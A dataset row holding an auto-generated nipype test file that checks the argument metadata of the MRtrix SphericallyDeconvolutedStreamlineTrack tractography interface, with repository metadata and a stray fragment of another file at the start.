rule_name=rule_name,
),
]
return domains
| [
"noreply@github.com"
] | CarstenFrommhold.noreply@github.com |
2a947cb9b779beaefbc64505b7502fe3f4a97d72 | 38346ccf93e0c0d49a378b2532fe215669018829 | /nipype/interfaces/mrtrix/tests/test_auto_SphericallyDeconvolutedStreamlineTrack.py | 447ba546dd431fb73ff3b3ce3dbc8a4164d3feb4 | [
"BSD-3-Clause"
] | permissive | swederik/nipype | de509c2605bc83448240c7c3c68ee8d220d48ef3 | 872720a6fc00b00e029fb67742deedee524b2a9f | refs/heads/master | 2020-12-25T10:08:44.268742 | 2014-05-22T14:05:58 | 2014-05-22T14:05:58 | 1,421,176 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,106 | py | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from nipype.testing import assert_equal
from nipype.interfaces.mrtrix.tracking import SphericallyDeconvolutedStreamlineTrack
def test_SphericallyDeconvolutedStreamlineTrack_inputs():
input_map = dict(args=dict(argstr='%s',
),
cutoff_value=dict(argstr='-cutoff %s',
units='NA',
),
desired_number_of_tracks=dict(argstr='-number %d',
),
do_not_precompute=dict(argstr='-noprecomputed',
),
environ=dict(nohash=True,
usedefault=True,
),
exclude_file=dict(argstr='-exclude %s',
xor=['exclude_file', 'exclude_spec'],
),
exclude_spec=dict(argstr='-exclude %s',
position=2,
sep=',',
units='mm',
xor=['exclude_file', 'exclude_spec'],
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
in_file=dict(argstr='%s',
mandatory=True,
position=-2,
),
include_file=dict(argstr='-include %s',
xor=['include_file', 'include_spec'],
),
include_spec=dict(argstr='-include %s',
position=2,
sep=',',
units='mm',
xor=['include_file', 'include_spec'],
),
initial_cutoff_value=dict(argstr='-initcutoff %s',
units='NA',
),
initial_direction=dict(argstr='-initdirection %s',
units='voxels',
),
inputmodel=dict(argstr='%s',
position=-3,
usedefault=True,
),
mask_file=dict(argstr='-mask %s',
xor=['mask_file', 'mask_spec'],
),
mask_spec=dict(argstr='-mask %s',
position=2,
sep=',',
units='mm',
xor=['mask_file', 'mask_spec'],
),
maximum_number_of_tracks=dict(argstr='-maxnum %d',
),
maximum_tract_length=dict(argstr='-length %s',
units='mm',
),
minimum_radius_of_curvature=dict(argstr='-curvature %s',
units='mm',
),
minimum_tract_length=dict(argstr='-minlength %s',
units='mm',
),
no_mask_interpolation=dict(argstr='-nomaskinterp',
),
out_file=dict(argstr='%s',
name_source=['in_file'],
name_template='%s_tracked.tck',
output_name='tracked.tck',
position=-1,
),
seed_file=dict(argstr='-seed %s',
xor=['seed_file', 'seed_spec'],
),
seed_spec=dict(argstr='-seed %s',
position=2,
sep=',',
units='mm',
xor=['seed_file', 'seed_spec'],
),
step_size=dict(argstr='-step %s',
units='mm',
),
stop=dict(argstr='-stop',
),
terminal_output=dict(mandatory=True,
nohash=True,
),
unidirectional=dict(argstr='-unidirectional',
),
)
inputs = SphericallyDeconvolutedStreamlineTrack.input_spec()
for key, metadata in input_map.items():
for metakey, value in metadata.items():
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_SphericallyDeconvolutedStreamlineTrack_outputs():
output_map = dict(tracked=dict(),
)
outputs = SphericallyDeconvolutedStreamlineTrack.output_spec()
for key, metadata in output_map.items():
for metakey, value in metadata.items():
yield assert_equal, getattr(outputs.traits()[key], metakey), value
| [
"satra@mit.edu"
] | satra@mit.edu |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.